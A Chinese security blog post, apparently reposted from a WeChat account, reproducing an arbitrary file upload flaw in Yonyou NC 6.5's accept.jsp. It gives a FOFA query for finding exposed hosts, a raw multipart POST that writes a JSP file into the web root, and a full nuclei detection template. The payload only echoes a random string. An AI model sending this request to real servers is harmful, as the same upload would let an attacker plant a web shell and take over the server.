用友NC accept.jsp任意文件上传漏洞复现 nuclei poc

admin 2023年11月7日14:30:27评论86 views字数 2437阅读8分7秒阅读模式


使



01

漏洞名称



用友NC accept.jsp任意文件上传漏洞


02


漏洞影响


用友NC 6.5

用友NC accept.jsp任意文件上传漏洞复现 nuclei poc



03


漏洞描述


用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。


04


FOFA搜索语句
icon_hash="1085941792"

用友NC accept.jsp任意文件上传漏洞复现 nuclei poc


05


漏洞复现


POC如下

POST /aim/equipmap/accept.jsp HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 449Accept: */*Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"Content-Type: text/plain
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="fname"
webappsnc_web2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

响应数据包如下

HTTP/1.1 200 OKConnection: closeContent-Length: 242Content-Type: text/html;charset=gb2312Date: Tue, 07 Nov 2023 02:52:24 GMT

浏览器访问回显文件

用友NC accept.jsp任意文件上传漏洞复现 nuclei poc

证明存在漏洞



06


nuclei poc


id: yonyou-nc-accept-fileupload
info: name: 用友NC accept.jsp任意文件上传漏洞 author: fgz severity: critical description: | 用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。 reference: none metadata: verified: true max-request: 2 fofa-query: icon_hash="1085941792" tags: yonyou,nc,fileupload,2023
variables: boundary: '{{rand_base(29)}}'
http: - raw: - | POST /aim/equipmap/accept.jsp HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: multipart/form-data; boundary=---------------------------{{boundary}} Accept-Encoding: gzip
-----------------------------{{boundary}} Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt" Content-Type: text/plain
<% out.println("{{randstr_2}}"); %> -----------------------------{{boundary}} Content-Disposition: form-data; name="fname"
webappsnc_web{{randstr_3}}.jsp -----------------------------{{boundary}}-- - | GET /{{randstr_3}}.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" condition: and

用友NC accept.jsp任意文件上传漏洞复现 nuclei poc



07


修复建议


关注官方补丁。

原文始发于微信公众号(AI与网安):用友NC accept.jsp任意文件上传漏洞复现 nuclei poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月7日14:30:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC accept.jsp任意文件上传漏洞复现 nuclei pochttp://cn-sec.com/archives/2183646.html

发表评论

匿名网友 填写信息